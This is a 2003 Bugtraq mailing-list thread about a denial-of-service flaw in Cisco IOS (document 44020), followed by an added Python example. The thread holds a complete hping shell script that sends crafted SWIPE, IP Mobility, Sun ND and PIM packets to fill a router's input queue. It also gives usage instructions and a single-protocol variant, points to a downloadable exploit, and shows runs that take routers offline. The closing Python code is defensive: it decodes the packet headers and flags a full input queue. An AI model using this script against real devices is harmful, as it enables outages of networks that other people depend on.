Thanks for the code, Pat. For those with a slightly older hping (rc1), the --ipproto switch can be replaced with -H and the --rand-source flag needs to be removed. The -H and --ipproto switches are the same and I don't think there's any need to have randomization of the source IP address for testing my own devices, so rc1 and rc2 should be able to test the devices equally well.

-----Original Message-----
From: Donahue, Pat [mailto:PDonahue@acmicorp.com]
Sent: Monday, July 21, 2003 1:19 PM
To: Martin Kluge; bugtraq@securityfocus.com
Subject: RE: Cisco IOS exploit (44020)

Here's a much simpler shell script that produces the same result:

--- BEGIN SHELL SCRIPT ---
#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
    echo "usage: $0 <router hostname|address> <ttl>"
    exit
endif

# one batch of packets per protocol number
foreach protocol (53 55 77 103)
    /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 19 --interval u250 --data 26
end
--- END SHELL SCRIPT ---

There's little reason to compile source code that will be run as root if the same thing can be accomplished with a tool that has been used and trusted by systems administrators for quite some time. Hping can be found at http://www.hping.org and "is a command-line oriented TCP/IP packet assembler/analyzer".

Before upgrading my routers, I wrote this script to confirm that they were indeed vulnerable. As you can see, the script iterates over the various protocols (SWIPE, IP Mobility, Sun ND, PIM) and sends 19 packets each using hping for a total of 76 (one more than needed to fill up the input queue). What is interesting to note is that the input queue on the interface can be exploited using just one of the vulnerable protocols; try changing the "foreach protocol (53 55 77 103)" line to "foreach protocol (53)" and then changing the "--count 19" parameter to "--count 76". When I first read the security advisory I thought that Cisco had tried to make it seem that all 4 were necessary.

You must be able to open raw sockets, so either run the script as root or set the suid bit. The syntax is:

./exploit.sh <hostname|address> <ttl>

where <hostname|address> is the hostname or IP address of the vulnerable Cisco IOS device and <ttl> is the TTL subtracted by 255. Here is an example:

> ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=255 time=1.063 ms
^C
> telnet 192.168.1.1

User Access Verification

Password:
telnet> close
# ./exploit.sh 192.168.1.1 0
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes

--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes

--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes

--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.1.1 (rl0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes

--- 192.168.1.1 hping statistic ---
19 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
> telnet 192.168.1.1
Trying 192.168.1.1...
telnet: Unable to connect to remote host: No route to host

And finally, from the console:

Router> show int FastEthernet0/0 | include Input
Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0

Regards,

Patrick Donahue
Network/Systems Administrator
ACMI Corporation

-----Original Message-----
From: Martin Kluge [mailto:martin@elxsi.de]
Sent: Monday, July 21, 2003 12:02 PM
To: bugtraq@securityfocus.com
Subject: Cisco IOS exploit (44020)

Hi,

I'd like to submit a DoS attack against the recently found bug in almost all Cisco IOS versions (Cisco document ID 44020). The exploit can be found here (and it is included as attachment):

http://www.elxsi.de/cisco-bug-44020.tar.gz

This exploit is NOT broken (like the shadowchode.tar.gz exploit for example):

Example:

bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.

User Access Verification

Username: 103
Password: ******
1003>show version
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
Image text-base: 0x02004000, data-base: 0x0259733C

ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE SOFTWARE (fc1)

1003 uptime is 6 minutes
System restarted by power-on
System image file is "flash:c1000-bnsy56-mz.120-22.bin"

cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
Processor board ID 03305903
Bridging software.
X.25 software, Version 3.0.0.
Basic Rate ISDN software, Version 1.1.
1 Ethernet/IEEE 802.3 interface(s)
1 ISDN Basic Rate interface(s)
7K bytes of non-volatile configuration memory.

bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
DEBUG: Hops: 1
DEBUG: Protocol: 53
DEBUG: Checksum: 47299
DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 61909
DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 55
DEBUG: Checksum: 55515
DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 53
DEBUG: Checksum: 10618
DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
DEBUG: Protocol: 77
DEBUG: Checksum: 40137
DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
DEBUG: Wrote 20 bytes.
<snip> ... <snip>
bash-2.05b# telnet 192.168.1.123
Trying 192.168.1.123...
telnet: Unable to connect to remote host: No route to host

If I log in via term, I can see the following:

Press RETURN to get started!

00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten
00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten
00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
00:00:39: %SYS-5-RESTART: System restarted --
Cisco Internetwork Operating System Software
IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Mon 01-Apr-02 19:36 by srani
00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up

1003>en
Password: ******
1003#show Interfaces Ethernet 0
Ethernet0 is up, line protocol is up
  Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
  Internet address is 192.168.1.123/24
  MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
  Encapsulation ARPA, loopback not set, keepalive set (10 sec)
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 00:02:04, output 00:00:04, output hang never
  Last clearing of "show interface" counters never
  Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
               ^^
               ||
The input queue is full :)

Cheers,
Martin Kluge

--
Name     : Martin Kluge
email    : martin@elxsi.info
Phone    : +49 160 1515182
Projects : http://www.aa-security.de
GPG Key  : http://www.elxsi.de/key.pub
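As an added example (not code from this thread, from Pat's script, or from Martin's cisco-bug-44020 tool), the Python below looks at the same evidence from the defender's side. It decodes the raw IPv4 headers that cisco-bug-44020 prints on its DEBUG lines, recomputes the header checksum, and flags the pattern both posts describe: one of protocols 53, 55, 77 or 103 addressed to the router itself. It also parses the "Input queue: 75/75/0/0 (size/max/drops/flushes)" counter line both posters quote from "show interfaces", which is the state to watch for on a device that has stopped answering. The sample hex dumps and counter line are copied from the thread; the set of router addresses is an assumption used only for classification, and the function names are my own. One detail the decoder makes visible: the decimal "Checksum:" values the tool prints are the on-wire checksums read back in little-endian host order (c3 b8 on the wire, 47299 printed).

```python
"""Defender-side checks for the Cisco IOS input-queue exhaustion thread
(Cisco document 44020). Added example; not code from the thread."""
import re

# Protocol numbers named in the thread: SWIPE, IP Mobility, Sun ND, PIM.
QUEUE_FILLING_PROTOCOLS = {53: "SWIPE", 55: "IP Mobility", 77: "Sun ND", 103: "PIM"}

# Constructed inputs, copied from the thread: the first DEBUG dump of
# cisco-bug-44020 and the "show interfaces" counter line both posters quote.
SAMPLE_DUMP = "45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b"
SAMPLE_QUEUE_LINE = "Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0"
# Assumption: the addresses the router itself owns (Martin's target interface).
ROUTER_ADDRS = {"192.168.1.123"}


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum of 16-bit words (RFC 791); caller zeroes the checksum field."""
    if len(header) % 2:
        header += b"\x00"
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_header(hex_dump: str, router_addrs=ROUTER_ADDRS) -> dict:
    """Decode a space-separated hex dump of an IPv4 header and classify it."""
    raw = bytes.fromhex(hex_dump)            # whitespace between bytes is skipped
    if len(raw) < 20 or raw[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl:
        raise ValueError("truncated IPv4 header")
    stored = int.from_bytes(raw[10:12], "big")
    computed = ipv4_checksum(raw[:10] + b"\x00\x00" + raw[12:ihl])
    info = {
        "total_length": int.from_bytes(raw[2:4], "big"),
        "ttl": raw[8],
        "protocol": raw[9],
        "protocol_name": QUEUE_FILLING_PROTOCOLS.get(raw[9]),
        "src": ".".join(str(b) for b in raw[12:16]),
        "dst": ".".join(str(b) for b in raw[16:20]),
        "checksum": stored,
        "checksum_ok": stored == computed,
        # The tool prints the checksum as a little-endian host integer.
        "checksum_as_printed": ((stored & 0xFF) << 8) | (stored >> 8),
    }
    # The thread's pattern: one of the four protocols, sent to the router itself.
    info["matches_44020_pattern"] = (
        info["protocol"] in QUEUE_FILLING_PROTOCOLS and info["dst"] in router_addrs
    )
    return info


INPUT_QUEUE_RE = re.compile(
    r"Input queue:\s*(\d+)/(\d+)/(\d+)/(\d+)\s*\(size/max/drops/flushes\)"
)


def parse_input_queue(line: str) -> dict:
    """Read size/max/drops/flushes from a 'show interfaces' line and flag exhaustion."""
    m = INPUT_QUEUE_RE.search(line)
    if m is None:
        raise ValueError("no input queue counters found")
    size, maximum, drops, flushes = (int(g) for g in m.groups())
    return {
        "size": size,
        "max": maximum,
        "drops": drops,
        "flushes": flushes,
        # Full queue with zero drops and flushes is exactly what both posters
        # show: packets held, nothing processed, nothing released.
        "exhausted": size >= maximum,
    }


if __name__ == "__main__":
    pkt = parse_ipv4_header(SAMPLE_DUMP)
    print(f"proto {pkt['protocol']} ({pkt['protocol_name']}) ttl {pkt['ttl']} "
          f"{pkt['src']} -> {pkt['dst']} checksum_ok={pkt['checksum_ok']} "
          f"pattern={pkt['matches_44020_pattern']}")
    q = parse_input_queue(SAMPLE_QUEUE_LINE)
    print(f"input queue {q['size']}/{q['max']} exhausted={q['exhausted']}")
```

Run it as-is and it reports the first dump as protocol 53 (SWIPE), TTL 1, 192.168.1.1 to 192.168.1.123, checksum valid, pattern matched, and the counter line as 75/75 exhausted. Feeding it the other DEBUG dumps from Martin's output gives the same verdict for each, which is the point: every packet is a well-formed, minimal (20-byte) IPv4 header whose only distinguishing features are the protocol number and the destination.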